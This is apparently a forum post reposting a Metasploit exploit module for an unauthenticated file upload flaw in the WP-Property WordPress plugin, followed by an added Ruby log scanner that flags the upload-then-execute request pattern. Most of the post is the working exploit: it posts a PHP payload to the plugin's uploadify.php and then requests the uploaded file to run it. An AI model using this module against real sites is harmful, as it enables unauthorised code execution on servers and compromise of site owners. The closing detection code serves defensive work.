China Network Penetration Testing Alliance

Title: WordPress WP-Property PHP File Upload Vulnerability

Author: admin    Time: 2013-1-4 19:51

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this is or how to use it. I'm talking about msf.
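
A defender-side check for the request pattern this module leaves in web server logs (a POST to uploadify.php, then a GET for a .php file in the same plugin directory), added here as an example and not part of the original post. The combined log format, the name scan_uploadify and the sample log lines are assumptions constructed for illustration.

```ruby
# Added example (not from the original post): find WP-Property uploadify abuse
# in combined-format access logs. Log lines below are constructed samples.
UPLOADIFY  = %r{/wp-content/plugins/wp-property/third-party/uploadify/(?<rest>[^?\s]*)}i
LOG_LINE   = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+)[^"]*" (?<status>\d{3}) /
SCRIPT_EXT = /\.(php\d?|phtml|phar)\z/i

# Returns one hash per suspicious request, in log order.
def scan_uploadify(lines)
  uploaders = {}   # client IP => true once it has POSTed to uploadify.php
  findings = []
  lines.each do |line|
    entry = LOG_LINE.match(line)
    next unless entry
    hit = UPLOADIFY.match(entry[:path])
    next unless hit
    rest = hit[:rest]
    if rest.casecmp?('uploadify.php')
      # Only the POST carries an upload; a bare GET is not reported here.
      next unless entry[:method] == 'POST'
      uploaders[entry[:ip]] = true
      findings << { kind: :upload_post, ip: entry[:ip], ts: entry[:ts],
                    path: entry[:path], status: entry[:status].to_i }
    elsif rest =~ SCRIPT_EXT
      # Any other script served from the upload directory is unexpected.
      findings << { kind: :script_in_upload_dir, ip: entry[:ip], ts: entry[:ts],
                    path: entry[:path], status: entry[:status].to_i,
                    after_upload: uploaders.key?(entry[:ip]) }
    end
  end
  findings
end

SAMPLE_LOG = [
  '192.0.2.10 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.7 - - [04/Jan/2013:19:41:12 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"',
  '198.51.100.7 - - [04/Jan/2013:19:41:13 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 74 "-" "-"',
  '198.51.100.7 - - [04/Jan/2013:19:41:14 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/qWzRt.php HTTP/1.1" 200 0 "-" "-"',
  '192.0.2.10 - - [04/Jan/2013:19:42:00 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_uploadify(SAMPLE_LOG).each { |finding| puts finding.inspect }
end
```

The module builds its payload with `:unlink_self=>true`, so the uploaded file may already be gone from disk; the access log is the more durable evidence.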



